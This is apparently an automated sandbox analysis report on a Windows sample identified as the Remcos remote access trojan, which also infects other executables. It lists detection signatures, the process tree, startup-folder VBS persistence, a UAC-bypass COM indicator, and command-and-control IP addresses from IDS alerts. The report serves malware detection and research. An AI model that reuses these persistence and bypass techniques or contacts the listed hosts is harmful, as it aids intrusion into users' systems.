Windows Analysis Report
tyRPPK48Mk.exe

Overview

General Information

Sample name: tyRPPK48Mk.exe (renamed because original name is a hash value)
Original sample name: 35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441.exe
Analysis ID: 1529033
MD5: 94a2b51672c9fb20b8bc7ebfcbf648c0
SHA1: b6bf724c582f4467fb4d87108744cafbdbd1169b
SHA256: 35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441
Tags: exe, Expiro, user-adrian__luca
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • tyRPPK48Mk.exe (PID: 732 cmdline: "C:\Users\user\Desktop\tyRPPK48Mk.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
    • name.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\tyRPPK48Mk.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
      • svchost.exe (PID: 5692 cmdline: "C:\Users\user\Desktop\tyRPPK48Mk.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • name.exe (PID: 2084 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
        • svchost.exe (PID: 2332 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • name.exe (PID: 6908 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
          • svchost.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • armsvc.exe (PID: 5692 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 044E4725979E3F506813C6D46BCC5F85)
  • alg.exe (PID: 2912 cmdline: C:\Windows\System32\alg.exe MD5: 6D599A0860A654A2D629A56D388C66FA)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7172 cmdline: C:\Windows\system32\AppVClient.exe MD5: CE73AC0BEBC9815C9D34668A399D261C)
  • FXSSVC.exe (PID: 7320 cmdline: C:\Windows\system32\fxssvc.exe MD5: 82E1FBAFE5AE9628723F49D8C572AFBC)
  • wscript.exe (PID: 7448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 94A2B51672C9FB20B8BC7EBFCBF648C0)
      • svchost.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • elevation_service.exe (PID: 7476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 65611321C594D4EC8606881B5B2236C0)
  • maintenanceservice.exe (PID: 7584 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: D4047A35D44FF5A878217467E0BC115E)
  • msdtc.exe (PID: 7672 cmdline: C:\Windows\System32\msdtc.exe MD5: 80FB2A9AB41BBA2E660763723BD5C683)
  • PerceptionSimulationService.exe (PID: 7892 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 8A50E57282AB78C6D3930BA31E2E66D7)
  • perfhost.exe (PID: 7956 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 39B7A38B4D293A74193E0AFFD1CF7BBC)
  • Locator.exe (PID: 8008 cmdline: C:\Windows\system32\locator.exe MD5: 1668426D4049F247816A6509230B04D6)
  • SensorDataService.exe (PID: 8036 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 39A4234D5B8BA6534DB70A8421277A62)
  • snmptrap.exe (PID: 8084 cmdline: C:\Windows\System32\snmptrap.exe MD5: 77032644518A6E344DB3C45614BB3462)
  • Spectrum.exe (PID: 8124 cmdline: C:\Windows\system32\spectrum.exe MD5: B90A4BF24B298B6114E19987A67C9450)
  • ssh-agent.exe (PID: 1060 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 528551BC5915FF99C29746E159C1E483)
  • TieringEngineService.exe (PID: 7280 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 022EEAB6B3A6A0E570E90A480C9C1AEB)
  • AgentService.exe (PID: 7356 cmdline: C:\Windows\system32\AgentService.exe MD5: 085BAFAFBBA6343A8BA8B383CB55A16F)
  • vds.exe (PID: 3288 cmdline: C:\Windows\System32\vds.exe MD5: FD669AD0BA373802EC20BC543357973C)
  • wbengine.exe (PID: 7468 cmdline: "C:\Windows\system32\wbengine.exe" MD5: C9F70CE234FCA9526C1C5BFCDAF44E2B)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6498c:$s1: CoGetObject
  • 0x649a0:$s1: CoGetObject
  • 0x649bc:$s1: CoGetObject
  • 0x6e95e:$s1: CoGetObject
  • 0x6494c:$s2: Elevation:Administrator!new:
Source | Rule | Description | Author | Strings
1.2.name.exe.3c50000.1.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
1.2.name.exe.3c50000.1.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
1.2.name.exe.3c50000.1.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
1.2.name.exe.3c50000.1.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x690b8:$a1: Remcos restarted by watchdog!
  • 0x69630:$a3: %02i:%02i:%02i:%03i
1.2.name.exe.3c50000.1.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x62f8c:$s1: CoGetObject
  • 0x62fa0:$s1: CoGetObject
  • 0x62fbc:$s1: CoGetObject
  • 0x6cf5e:$s1: CoGetObject
  • 0x62f4c:$s2: Elevation:Administrator!new:

System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 7448, ProcessName: wscript.exe
Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 4420, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ProcessId: 5692, ProcessName: svchost.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 7448, ProcessName: wscript.exe
Source: Process started, Author: vburov: Data: Command: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 4420, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\tyRPPK48Mk.exe", ProcessId: 5692, ProcessName: svchost.exe

Data Obfuscation

Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 4420, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Stealing of Sensitive Information

Source: Registry Key set, Author: Joe Security: Data: Details: 27 EA 85 E9 2E 71 5C A9 74 66 5C 9B 79 E9 65 B1 1D 7B 49 A9 FE C0 30 EA 22 09 50 CA 24 5D AA 76 66 44 7B 02 9C 7D 59 DB 6D 6A 97 5B CA 8E ED 6F 0C 4A 02 80 D1 D8 7B DB 88 3B 4D F3 65 84 C9 3F , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 4476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-98KSNN\exepath
              2024-10-08T15:30:19.935528+020020516521A Network Trojan was detected192.168.2.4625801.1.1.153UDP
              2024-10-08T15:30:19.957787+020020516521A Network Trojan was detected192.168.2.4625801.1.1.153UDP
              2024-10-08T15:30:20.973754+020020516521A Network Trojan was detected192.168.2.4625801.1.1.153UDP
              2024-10-08T15:30:44.526136+020020516521A Network Trojan was detected192.168.2.4492621.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:02.566420+020020516491A Network Trojan was detected192.168.2.4492491.1.1.153UDP
              2024-10-08T15:28:06.066011+020020516491A Network Trojan was detected192.168.2.4575331.1.1.153UDP
              2024-10-08T15:30:38.939328+020020516491A Network Trojan was detected192.168.2.4585291.1.1.153UDP
              2024-10-08T15:31:01.420227+020020516491A Network Trojan was detected192.168.2.4537611.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:01.462034+020020516481A Network Trojan was detected192.168.2.4635801.1.1.153UDP
              2024-10-08T15:28:04.661509+020020516481A Network Trojan was detected192.168.2.4508531.1.1.153UDP
              2024-10-08T15:30:37.890251+020020516481A Network Trojan was detected192.168.2.4611941.1.1.153UDP
              2024-10-08T15:31:00.404573+020020516481A Network Trojan was detected192.168.2.4560681.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:00.917887+020020181411A Network Trojan was detected54.244.188.17780192.168.2.449735TCP
              2024-10-08T15:28:01.591126+020020181411A Network Trojan was detected18.141.10.10780192.168.2.449736TCP
              2024-10-08T15:28:04.583945+020020181411A Network Trojan was detected44.221.84.10580192.168.2.449745TCP
              2024-10-08T15:28:39.943894+020020181411A Network Trojan was detected13.251.16.15080192.168.2.449789TCP
              2024-10-08T15:28:40.146546+020020181411A Network Trojan was detected47.129.31.21280192.168.2.449790TCP
              2024-10-08T15:28:44.385830+020020181411A Network Trojan was detected34.246.200.16080192.168.2.449828TCP
              2024-10-08T15:28:44.960418+020020181411A Network Trojan was detected18.208.156.24880192.168.2.449835TCP
              2024-10-08T15:28:50.660540+020020181411A Network Trojan was detected35.164.78.20080192.168.2.449872TCP
              2024-10-08T15:28:51.300193+020020181411A Network Trojan was detected3.94.10.3480192.168.2.449883TCP
              2024-10-08T15:29:00.825835+020020181411A Network Trojan was detected34.211.97.4580192.168.2.449963TCP
              2024-10-08T15:29:00.949795+020020181411A Network Trojan was detected44.213.104.8680192.168.2.449966TCP
              2024-10-08T15:29:20.912788+020020181411A Network Trojan was detected3.254.94.18580192.168.2.450123TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:00.917887+020020377711A Network Trojan was detected54.244.188.17780192.168.2.449735TCP
              2024-10-08T15:28:01.591126+020020377711A Network Trojan was detected18.141.10.10780192.168.2.449736TCP
              2024-10-08T15:28:04.583945+020020377711A Network Trojan was detected44.221.84.10580192.168.2.449745TCP
              2024-10-08T15:28:39.943894+020020377711A Network Trojan was detected13.251.16.15080192.168.2.449789TCP
              2024-10-08T15:28:40.146546+020020377711A Network Trojan was detected47.129.31.21280192.168.2.449790TCP
              2024-10-08T15:28:44.385830+020020377711A Network Trojan was detected34.246.200.16080192.168.2.449828TCP
              2024-10-08T15:28:44.960418+020020377711A Network Trojan was detected18.208.156.24880192.168.2.449835TCP
              2024-10-08T15:28:50.660540+020020377711A Network Trojan was detected35.164.78.20080192.168.2.449872TCP
              2024-10-08T15:28:51.300193+020020377711A Network Trojan was detected3.94.10.3480192.168.2.449883TCP
              2024-10-08T15:29:00.825835+020020377711A Network Trojan was detected34.211.97.4580192.168.2.449963TCP
              2024-10-08T15:29:00.949795+020020377711A Network Trojan was detected44.213.104.8680192.168.2.449966TCP
              2024-10-08T15:29:20.912788+020020377711A Network Trojan was detected3.254.94.18580192.168.2.450123TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-08T15:28:02.007408+020028508511Malware Command and Control Activity Detected192.168.2.449739172.234.222.14380TCP
              2024-10-08T15:29:04.863924+020028508511Malware Command and Control Activity Detected192.168.2.44999818.208.156.24880TCP
              2024-10-08T15:30:05.317102+020028508511Malware Command and Control Activity Detected192.168.2.45023518.208.156.24880TCP
              2024-10-08T15:31:10.411079+020028508511Malware Command and Control Activity Detected192.168.2.45653982.112.184.19780TCP


              AV Detection

              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Infector.Gen
              Source: tyRPPK48Mk.exe, ReversingLabs: Detection: 73%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe, Joe Sandbox ML: detected
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Joe Sandbox ML: detected
              Source: tyRPPK48Mk.exe, Joe Sandbox ML: detected
              Source: name.exe, 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_fb5aa34f-1

              Exploits

              Source: tyRPPK48Mk.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: snmptrap.pdb source: svchost.exe, 00000006.00000003.2004063369.0000000005760000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: svchost.exe, 00000006.00000003.2438532554.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: svchost.exe, 00000006.00000003.2393262607.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: svchost.exe, 00000006.00000003.2602531162.0000000004B90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINLOA~1.PDBIEnloh source: svchost.exe, 00000006.00000003.2113410162.0000000003083000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\vds.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Windows\System32\alg.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\SysWOW64\svchost.exe System file written: C:\Program Files\7-Zip\7zFM.exe
